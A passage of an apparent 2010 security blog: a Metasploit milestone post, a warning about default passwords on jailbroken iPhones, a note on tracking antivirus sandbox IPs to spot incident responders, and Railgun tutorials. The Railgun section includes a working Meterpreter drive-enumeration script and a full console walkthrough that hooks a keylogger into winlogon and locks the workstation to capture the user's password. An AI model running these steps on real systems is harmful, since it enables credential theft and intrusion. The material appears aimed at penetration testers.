Ask any developer and they will tell you that the age of a project is not calculated in calendar time, but in worker hours or "commits" to a project. The Metasploit Framework hit 10,000 today.

With the project dating back to 2003, much before the official "Revision 1" happened, there have been a lot of changes. Going from the initial incarnation as a network "game" written in perl to the world largest ruby project, the framework has seen it's fair share of blood, sweat, and tears. With Express out and Pro to come, there will definitely be 10,000 more.

Congratulations to the team, both past and present. What you guys do is extraordinary.

Back in 2009 the “ikee” rick-rolling worm went around the iPhone world via the password of ‘alpine’ on the root account. You are now warned to change your root password when you pop into Cydia and Rock the first time. But this thing just wont stay down.

If you have jailbroken your iPad you might want to check out a little file called “master.passwd”. In it, there is another user called ‘mobile’ which has been pointed out since 2008 (here) on the iPhone as another account to change the password of. But the media and Cydia/Rock warnings only put emphasis on ‘root’.

Many iPad and iPhone apps STILL do not use the “keyring'” and store your password in plain text or somewhere in a binary file (still plaintext), which the user “mobile” has access to.

Ok, “so what” you say. Since this recent jailbreak was using a website, the individuals running that site now have the IP address of freshly jailbroken iPhones and iPads. I am certainly not saying that they have any ill intentions, but sites have been broken into before, and that would be one hell of a gold mine.

Hopefully AT&T has put in blocks of some sort so that it’s customers are protected, but who knows what the other countries around the world that carry iPhones are doing.

But at the very least, if you have jailbroken your iPhone, iPod Touch or iPad, please.. please set your passwords accordingly and do not have it a simple dictionary password.

Remember, you ARE giving up some security when you jail break your phone. It is on you to make sure that you lock what you can back down.

To change your password, use 'Terminal' and log in to one account at a time and issue the "passwd" command. You can also just log in to root and issue the "passwd mobile" command to change the password of mobile

Update on Monday, August 9, 2010 at 3:34PM by Rob Fuller

I've gotten a lot of comments stating that OpenSSH isn't installed by default and that this is not a big deal at all. A couple problems exist in that argument though:

1. The Jailbreak is executing code on your phone/touch/ipad. Unless you do a analysis of the entire disk, you can't be sure the jailbreak doesn't leave some other way into the phone. Yes, that's a far fetched chance, but most users would never know.

2. Even if you don't install it Out-of-the-box. There is a good possibility that you will OpenSSH at a later date. Better to get it fixed while you have it on the mind.

 

Ever set up a multi/handler and get an odd IP hitting it? Probably forgot about it as internet chatter? Think again, you might have just been caught

AV Tracker – ( http://avtracker.info/ ) is a site that tracks the different IP addresses, hostnames, computer names and user agents that AV and other “Submit-your-malware-here” drop boxes use.

Peter Kleissner and his team provide

• ranges that the hosts use
• a dynamic text file with the IP addresses listed if you want to add it to some auto updating block list
• a line by line IPTABLES block config
• and even C code to add into your binary to make sure it doesn’t talk out from one of those addresses (I could be reading it wrong, still a beginner in C)

The team has been criticized a lot by AV vendors, enough so the took down the site in January of this year. But it came back June 5th.

I use this site to help me know when the Incident Responders are on to me for my pen testing jobs. I do not wish to get in the debate of how a tool could be used.

Metasploit’s Railgun is awesome, but getting things to work correctly can be a pain. Here are some of the resources that have helped me out:

1. System Error Codes – This is hands down the best resource you have, it will tell you what that stupid “5” or “1314” means in your return value. Keep this tab open to circumvent crazed bovine attacks.
2. theForger’s Win32 API Programming Tutorial – A really good place to start when you are getting to know the Windows API and the frustrations that come along with it. I highly recommend going through it first.
3. MS Windows API Reference – Gigantic, and not the easiest to navigate, but really good for knowing what calls were added with each version of Windows as well as a basic (alphabetic) list of calls. Good if you know where you are going.
4. The Undocumented Functions – Win NT/2k/XP/2k3 – A really old link but has good references to undocumented functions that have helped circumvent some of the stupidity of other more complicated functions.
5. WineAPI Documentation – A great resource of API calls that mimic the Microsoft ones (Undocumented and Documented).

Hope this helps and I look forward to seeing what you come up with...

Back on June 13th, “Patrick HVE” released RAILGUN:

http://mail.metasploit.com/pipermail/framework/2010-June/006382.html

And it was merged into the the Metasploit trunk with 9709, 9710, 9711 and 9712:

http://www.metasploit.com/redmine/projects/framework/repository/revisions/9712

Basically what this allows you to do is make Windows API calls from Meterpreter without compiling your own DLL. It currently supports a number of Windows API dlls:

• iphlpapi
• ws2_32
• kernel32
• ntdll
• user32
• advapi32

(You can find out exactly what functions are available by default in the api.rb file)

It’s also very extensible, it doesn’t have a DLL or function you need? But you can read all about in the manual:

./external/source/meterpreter/source/extensions/railgun/railgun_manual.pdf

Here are two examples where this comes in very handy:

List Drives:

The problem that I’ve had on a number of pentests is that you get shell, but from CMD or Meterpreter there is no good way to find all of the volumes (drives) attached.

• net use – Shows you what Network drives are connected, but not physical ones
• fsutil fsinfo drives – You must be an administrator to ride this train
• fdisk /status – Only on OLD versions of DOS, not sure when this disappeared

But railgun solves this problem with a really short script:

# Load the Railgun plugin
client.core.use("railgun")
# Make the API call to enum drive letters 
a = client.railgun.kernel32.GetLogicalDrives()["return"]
# Math magic to convert the binary to letters
drives = []
letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
(0..25).each do |i|
    test = letters[i,1]
    rem = a % (2**(i+1))
    if rem > 0
        drives << test
        a = a - rem
    end
end
print_line("Drives Available = #{drives.inspect}")

Output:
Drives Available = ["A", "C", "D", “P”, “X”]

Save this as a meterpreter script and it’ll print every logical drive attached to the system even as a limited user (that the user can see).

Logical drives include: (hdd, network, mass storage, optical, etc). This opens up the doors to infecting USB sticks and network drives…

JEDI KEYLOGGING:

One of the problems with keylogging is you never know when that person will log in, and if you’re using a client side, they have probably already logged in and you’re hoping they log into a portal or some other password protected site.

Railgun to the rescue again:

# Start the keylogger running in the background dumping keys every 15 seconds, attached to Winlogon
meterpreter > bgrun keylogrecorder -c 1 -t 15
[*] Executed Meterpreter with Job ID 0
meterpreter > [*]     winlogon.exe Process found, migrating into 640
[*] Migration Successful!!
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf3/logs/scripts/keylogrecorder/192.168.92.122_20100707.4539.txt
[*] Recording

# Drop to IRB to initialize railgun and lockout the workstation, forcing the user to use their credentials again.

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client

>> client.core.use("railgun")
=> true
>> client.railgun.user32.LockWorkStation()
=> {"GetLastError"=>0, "return"=>true}
>> exit
meterpreter >

Set up “tail –f” going on the log file for the keylogger and then kill the keylogger when you’ve gotten what you came for.

meterpreter > bglist
[*] Job 0: ["keylogrecorder", "-c", "1", "-t", "15"]
meterpreter > bgkill 0
[*] Killing background job 0...
meterpreter >

Hope you have fun with railgun and shoot me an email mubix@hak5.org or leave a comment if you have any other crazy uses for railgun.